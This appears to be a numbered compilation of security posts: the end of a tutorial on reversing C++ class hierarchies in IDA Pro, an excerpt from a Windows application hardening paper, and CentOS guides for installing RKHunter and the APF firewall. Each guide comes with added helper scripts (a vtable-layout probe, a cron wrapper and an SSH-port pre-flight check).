          result = a1;
          a1->members.field_0 = 42;
          return result;
        }

    In brief

      • When you find a new class, give it a symbolic name, and resolve the whole tree before figuring out what its real name should be.
      • Start from the ancestor and go up to the children.
      • Look at the constructors and destructors first; check out the references to new() and static methods.
      • Often, the methods of the same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other.
      • Sometimes, the constructors are inlined in the child classes' constructors, or even at the place of the instantiation.
      • If you want to save time when reversing huge inherited structures, use the struct inclusion trick to name variables only once.
      • Use and abuse Hex-rays' typing system, it's very powerful.
      • Pure virtual classes are hell: you can find several classes having similar vtables, but no code in common. Beware of them.

    Sources

    Try this at home! The binary (elf32 stripped). The source file. Don't open it too fast!

    Source: Reversing C++ programs with IDA pro and Hex-rays at Aris' Blog - Computers, ssh and rock'n roll
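    The layout the article infers from the disassembly, reproduced from the source side as an added example (my code, not part of the original post or of Aris' article): a two-level hierarchy shaped like class2/class1, with probe functions that read the object bytes the way a reverser would. It checks that the vptr is the first word of the object, that the first data member sits right after it, that a subclass adding no members is exactly as big as its parent, that a call through a base pointer dispatches via the vtable, and that each destructor resets the vptr to its own class's vtable as the hierarchy is unwound. The class and function names (A, B, field_0, read_vptr and the rest) are my own, not identifiers from the article's binary, and the layout assumptions hold for single inheritance under the Itanium C++ ABI (G++, Clang); MSVC agrees for the single-inheritance case.

```cpp
// Added example: the article's class2/class1 pair rebuilt as A/B, plus probes
// that observe the object layout the article recovers in IDA. Names are mine.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>

// Copy out the first pointer-sized word of an object. For single inheritance
// on G++/Clang/MSVC this is the vptr, which is what the article relies on.
static uintptr_t read_vptr(const void *obj) {
    uintptr_t v;
    std::memcpy(&v, obj, sizeof(v));
    return v;
}

// Recorded by the destructors so we can check which vptr was active inside them.
static uintptr_t vptr_in_a_dtor = 0;
static uintptr_t vptr_in_b_dtor = 0;

struct A {                       // the article's "class2": vptr + one int field
    int field_0;
    A() : field_0(42) { std::puts("A::A()"); }
    virtual const char *method_1() { return "A::method_1"; }
    virtual ~A() { vptr_in_a_dtor = read_vptr(this); std::puts("A::~A()"); }
};

struct B : A {                   // the article's "class1": no new data, overrides method_1
    B() { std::puts("B::B()"); }
    const char *method_1() override { return "B::method_1"; }
    ~B() override { vptr_in_b_dtor = read_vptr(this); std::puts("B::~B()"); }
};

// vptr values of freshly constructed objects: one distinct vtable per class,
// the off_8048A38 / off_8048A50 pair of the article.
uintptr_t vptr_of_a() { A a; return read_vptr(&a); }
uintptr_t vptr_of_b() { B b; return read_vptr(&b); }

// Offset of field_0 from the start of the object: "the 4 bytes after the first
// 4" on the article's 32-bit build, sizeof(void*) in general.
std::size_t field_0_offset() {
    B b;
    return static_cast<std::size_t>(reinterpret_cast<const char *>(&b.field_0) -
                                    reinterpret_cast<const char *>(&b));
}

// B adds no members, so the subclass is exactly as big as its parent, which is
// how the article deduces class2's size from class1's new(8).
std::size_t size_of_a() { return sizeof(A); }
std::size_t size_of_b() { return sizeof(B); }

// Virtual dispatch through a base pointer: the "(**(void (***)(void *))v0)(v0)"
// pattern in the decompiled main().
const char *call_method_1_through_base(bool make_b) {
    A *obj = make_b ? static_cast<A *>(new B) : new A;
    const char *r = obj->method_1();
    delete obj;                  // virtual dtor: runs ~B (if B) and then ~A
    return r;
}

// Destroy a B through an A* and report whether each destructor saw its own
// class's vptr, i.e. whether the vptr is reset while the hierarchy unwinds.
bool dtors_reset_vptr() {
    uintptr_t va = vptr_of_a(), vb = vptr_of_b();
    vptr_in_a_dtor = vptr_in_b_dtor = 0;
    A *obj = new B;
    delete obj;
    return vptr_in_b_dtor == vb && vptr_in_a_dtor == va;
}

int main() {
    std::printf("sizeof(A)=%zu sizeof(B)=%zu field_0 at +%zu\n",
                size_of_a(), size_of_b(), field_0_offset());
    std::printf("vptr(A)=%#lx vptr(B)=%#lx\n",
                (unsigned long)vptr_of_a(), (unsigned long)vptr_of_b());
    std::printf("through A*: %s / %s\n",
                call_method_1_through_base(false), call_method_1_through_base(true));
    std::printf("destructors reset vptr: %s\n", dtors_reset_vptr() ? "yes" : "no");
    return 0;
}
```

    Build with g++ -std=c++11 and run it. On a 64-bit build the sizes come out as 16 with field_0 at +8, the same shape as the article's 8-byte objects with the member at +4 on its 32-bit sample. vptr_of_a() and vptr_of_b() return different addresses because each class has its own vtable, and dtors_reset_vptr() returning true is the source-side view of the m2 destructors above writing class1__vtable and then class2__vtable back into the object.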
  22. Hardening Windows Applications

    olleB - olle @ toolcrypt.org

    About this document

    This paper is aimed at Windows developers in the hope of explaining how Windows' security features can be used to better secure their applications. It is not a complete guide to the Windows security model and may skip details that were deemed unimportant at the time of writing. Please bear that in mind while reading. Thank you.

    Introduction to Windows security

    In this introductory chapter some basic concepts of the Windows security model are explained in just enough detail to understand the material presented in the following chapters. If you are already familiar with how the Windows model of access control works, feel free to skip ahead and use this chapter for reference only. Another great reference is the MSDN section on Access Control available at Access Control (Windows).

    Download: https://media.blackhat.com/bh-us-10/whitepapers/olleb/BlackHat-USA-2010-olleb-Hardening-Windows-Applications-wp.pdf
  23. Install RKHunter

Product Name: RKHunter
Product Version: 1.3.6
Homepage: Rootkit.nl - Protect your machine
Description: rkhunter (Rootkit Hunter) is a Unix-based tool that scans for rootkits, backdoors and possible local exploits. It does this by comparing MD5 hashes of important files with known good ones in an online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD.

Step 1: Downloading, Installing and Updating

cd /usr/local/src
wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz
wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz.sha1.txt
sha1sum -c rkhunter-1.3.6.tar.gz.sha1.txt
tar -zxvf rkhunter-1.3.6.tar.gz
cd rkhunter-1.3.6
./installer.sh --layout default --install
/usr/local/bin/rkhunter --update
/usr/local/bin/rkhunter --propupd
rm -Rf /usr/local/src/rkhunter*
cd

Step 2: Adding daily cron job

Step 2.1: Create run-file

nano -w /etc/cron.daily/rkhunter.sh

Step 2.2: Add this text to rkhunter.sh

#!/bin/sh
(
/usr/local/bin/rkhunter --versioncheck
/usr/local/bin/rkhunter --update
/usr/local/bin/rkhunter --cronjob --report-warnings-only
) | /bin/mail -s 'rkhunter Daily Run (PutYourServerNameHere)' your@email.here

REMEMBER TO CHANGE (PutYourServerNameHere) AND your@email.here

Step 2.3: Chmod rkhunter.sh to root only

chmod 700 /etc/cron.daily/rkhunter.sh

There you go! RKHunter should be installed, and you will get a daily mail with the status of your system.

Source: Install RKHunter | SecureCentos.com
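Two practical notes on the procedure above, and an added example that is not part of the SecureCentos.com guide or the post. First, the .sha1.txt file is fetched from the same mirror as the tarball, so "sha1sum -c" only catches a corrupted download, not a mirror that serves a modified tarball together with a matching checksum; and "--propupd" records the current file properties as the baseline, so it must be run on a system you already trust. Second, the Step 2.2 script pipes the output into mail unconditionally, so you get a message every day whether or not anything was found, and the scan's exit status is thrown away. The wrapper below keeps the same rkhunter path and /bin/mail as the guide, but writes the output to a temporary file and only sends a report when the scan printed something or exited non-zero; the MAILTO default and the /etc/cron.daily/rkhunter.sh file name it keys on are assumptions to adjust.

```shell
#!/bin/sh
# Added example, not part of the SecureCentos.com guide: a replacement for the
# Step 2.2 cron script that mails a report only when rkhunter found something
# (output from --report-warnings-only, or a non-zero exit status), instead of
# sending an empty message every day. The rkhunter path and the mail command
# follow the guide; MAILTO is an assumption to adjust.
RKHUNTER=${RKHUNTER:-/usr/local/bin/rkhunter}
MAILTO=${MAILTO:-root}
HOST=$(hostname 2>/dev/null || echo unknown)

# run_scan LOGFILE: update the signature database, then run the cron-style
# scan, appending everything to LOGFILE. The function's status is the
# scan's exit status.
run_scan() {
    "$RKHUNTER" --update --nocolors >>"$1" 2>&1
    "$RKHUNTER" --cronjob --report-warnings-only --nocolors >>"$1" 2>&1
}

# needs_report LOGFILE STATUS: succeed when a mail should go out, i.e. the
# scan exited non-zero or it printed anything at all.
needs_report() {
    [ "$2" -ne 0 ] && return 0
    [ -s "$1" ] && return 0
    return 1
}

# count_warnings LOGFILE: number of lines rkhunter flagged with "Warning:".
count_warnings() {
    n=$(grep -c 'Warning:' "$1" 2>/dev/null || true)
    echo "${n:-0}"
}

main() {
    log=$(mktemp /tmp/rkhunter.XXXXXX) || exit 1
    run_scan "$log"
    status=$?
    if needs_report "$log" "$status"; then
        /bin/mail -s "rkhunter on $HOST: exit $status, $(count_warnings "$log") warning line(s)" "$MAILTO" <"$log"
    fi
    rm -f "$log"
}

# Only scan when installed under the guide's name, /etc/cron.daily/rkhunter.sh;
# sourcing the file elsewhere just defines the functions.
if [ "${0##*/}" = rkhunter.sh ]; then
    main
fi
```

Install it with the same "chmod 700" as in Step 2.3. The subject line carries the exit status and the number of "Warning:" lines, so a report that arrives with "exit 0" and zero warnings but a non-empty body is worth a look: it means rkhunter printed something that is not a warning, typically an update or version-check message.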
  24. Install Firewall

Guide for installing CSF Firewall will come later.. APF is used because it's the site admin's favorite, and it's stable and simple to set up. Might be better for new guys? Fuel for discussion.

Product Name: APF (Advanced Policy Firewall)
Product Version: 0.9.7 rev:1
Homepage: Advanced Policy Firewall | R-fx Networks
Description: Advanced Policy Firewall (APF) is an iptables (netfilter) based firewall system designed around the essential needs of today's Internet-deployed servers and the unique needs of custom-deployed Linux installations. The configuration of APF is designed to be very informative and present the user with an easy-to-follow process, from top to bottom of the configuration file. The management of APF on a day-to-day basis is conducted from the command line with the apf command, which includes detailed usage information and all the features one would expect from a current and forward-thinking firewall solution.

Pre Setup: Make sure iptables is installed

yum install iptables* -y

Step 1: Download, unpack, install of APF from source.

cd /usr/local/src
wget http://www.rfxn.com/downloads/apf-current.tar.gz
tar -zxf apf-current.tar.gz
cd apf-9*
./install.sh

Step 1.1: Cleanup source install files.

rm -Rf /usr/local/src/apf-9* && cd

Step 2: Backup original apf config

cp /etc/apf/conf.apf /etc/apf/conf.apf.bak

Step 3: Edit current APF Config

nano -w /etc/apf/conf.apf

Change:
* RAB="0" to RAB="1"
* RAB_PSCAN_LEVEL="2" to RAB_PSCAN_LEVEL="3"
* TCR_PASS="1" to TCR_PASS="0"
* DLIST_PHP="0" to DLIST_PHP="1"
* DLIST_SPAMHAUS="0" to DLIST_SPAMHAUS="1"
* DLIST_DSHIELD="0" to DLIST_DSHIELD="1"
* DLIST_RESERVED="0" to DLIST_RESERVED="1"

Step 3.1: Find IFACE_IN= and IFACE_OUT= in /etc/apf/conf.apf and verify that they match your network interface

Step 3.2: Locate HELPER_SSH_PORT="22" and change it to your SSH port IF you changed it in your sshd_config

Step 3.3: Locate IG_TCP_CPORTS="22" and change it to your SSH port IF you changed it in your sshd_config

REMEMBER: MAKE SURE YOU CHANGE YOUR SSHD PORT IN APF IF YOU CHANGED IT IN SSHD_CONFIG. You can run this command, "cat /etc/ssh/sshd_config | grep Port", to see what port your SSHD uses.

Step 4: Restart the APF

/usr/local/sbin/apf -r

Step 5: Now relogin through ssh again, to verify that you can still log in to your server

Step 6: When you're happy with your firewall and everything works fine, edit /apf.conf, find DEVEL_MODE="1" and change it to DEVEL_MODE="0"

Step 7: Restart APF again

/usr/local/sbin/apf -r

Step 8: Make sure APF starts automatically after restart

chkconfig --add apf
chkconfig --level 345 apf on

You should NOW have a firewall up and running! Enjoy

Port setting example for different hosting control panels:

Directadmin:
IG_TCP_CPORTS="21,22,25,53,80,110,111,143,443,587,953,2222,3306,32769"
IG_UDP_CPORTS="53,111,631,724,5353,32768,32809"
EGF="1"
EG_TCP_CPORTS="21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089"
EG_UDP_CPORTS="20,21,37,53,873"

Cpanel:
IG_TCP_CPORTS="20,21,22,25,26,53,80,110,143,443,465,993,995,2082,2083,2086,2087,2095,2096"
IG_UDP_CPORTS="21,53,873"
EGF="1"
EG_TCP_CPORTS="21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089"
EG_UDP_CPORTS="20,21,37,53,873"

Troubleshooting:

Problem: If you get this error: apf(xxxxx): {glob} unable to load iptables module (ip_tables), aborting.
Solution: Try changing SET_MONOKERN="0" to SET_MONOKERN="1", then apf -r

Problem: If you get this message: apf(xxxxx): {glob} !!DEVELOPMENT MODE ENABLED!! - firewall will flush every 5 minutes.
Solution: You need to change DEVEL_MODE=1 to DEVEL_MODE=0; make sure your config is working first.

Source: Install Firewall | SecureCentos.com
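The one step in the guide above that can cost you the box is Step 3.3: if IG_TCP_CPORTS does not contain the port sshd really listens on, "apf -r" in Step 4 closes your only way in, and DEVEL_MODE="1" (which flushes the rules every five minutes) is the only thing that saves you. The following is an added pre-flight check, not code from the SecureCentos.com guide or from APF itself: it reads the Port directive(s) from sshd_config, compares them with the IG_TCP_CPORTS list in conf.apf (including APF's low_high range syntax), and appends any port that is missing before you restart the firewall. The file paths in the usage line are the guide's; the sample sshd_config and conf.apf contents are constructed for illustration, and "ListenAddress host:port" forms of sshd_config are deliberately not parsed.

```shell
#!/bin/sh
# Added example, not part of the SecureCentos.com guide: a pre-flight check
# for Step 3.3 that reads the port(s) sshd actually listens on and makes sure
# each one is in IG_TCP_CPORTS before "apf -r" is run, so the new rule set
# cannot lock you out of the box.
# Usage: ./check_apf_ssh.sh /etc/ssh/sshd_config /etc/apf/conf.apf
# (paths follow the guide; any sample data used with this script is constructed).

# sshd_ports CONFIG: print each port sshd listens on, one per line.
# Only "Port N" directives are read (commented lines are skipped);
# "ListenAddress host:port" forms are not parsed. No Port line means
# sshd's default of 22.
sshd_ports() {
    ports=$(awk 'tolower($1) == "port" { print $2 }' "$1")
    if [ -n "$ports" ]; then
        printf '%s\n' "$ports"
    else
        echo 22
    fi
}

# conf_value FILE KEY: the value of KEY="..." in an APF config file, quotes stripped.
conf_value() {
    sed -n "s/^$2=\"\([^\"]*\)\".*/\1/p" "$1" | tail -n 1
}

# port_in_list PORT LIST: succeed when PORT appears in a comma-separated APF
# port list. APF writes ranges as low_high (for example 30000_35000); those
# are honoured too.
port_in_list() {
    port=$1
    for item in $(printf '%s' "$2" | tr ',' ' '); do
        case $item in
            *_*)
                lo=${item%_*}
                hi=${item#*_}
                if [ "$port" -ge "$lo" ] && [ "$port" -le "$hi" ]; then
                    return 0
                fi
                ;;
            *)
                if [ "$item" = "$port" ]; then
                    return 0
                fi
                ;;
        esac
    done
    return 1
}

# ensure_port FILE KEY PORT: append PORT to KEY's list in FILE if it is missing.
# Returns 0 when the port was already allowed, 1 when it had to be added.
ensure_port() {
    current=$(conf_value "$1" "$2")
    if port_in_list "$3" "$current"; then
        return 0
    fi
    if [ -z "$current" ]; then
        sed -i "s/^$2=\"\"/$2=\"$3\"/" "$1"
    else
        sed -i "s/^\($2=\"[^\"]*\)\"/\1,$3\"/" "$1"
    fi
    return 1
}

# check_apf_ssh SSHD_CONFIG APF_CONF: allow every sshd port inbound, reporting
# each addition. Returns 0 if the config already covered them, 1 if it was edited.
check_apf_ssh() {
    changed=0
    for p in $(sshd_ports "$1"); do
        if ! ensure_port "$2" IG_TCP_CPORTS "$p"; then
            echo "added sshd port $p to IG_TCP_CPORTS in $2"
            changed=1
        fi
    done
    return "$changed"
}

if [ $# -eq 2 ]; then
    check_apf_ssh "$1" "$2"
fi
```

Run it between Step 3 and Step 4, after the "cp conf.apf conf.apf.bak" of Step 2, since it edits the file in place with sed -i. The same HELPER_SSH_PORT value from Step 3.2 is not touched here; it only affects APF's SSH helper rule, whereas IG_TCP_CPORTS is what actually opens the port. Keep DEVEL_MODE="1" for the first restart regardless: this check covers the sshd port, not a typo elsewhere in conf.apf.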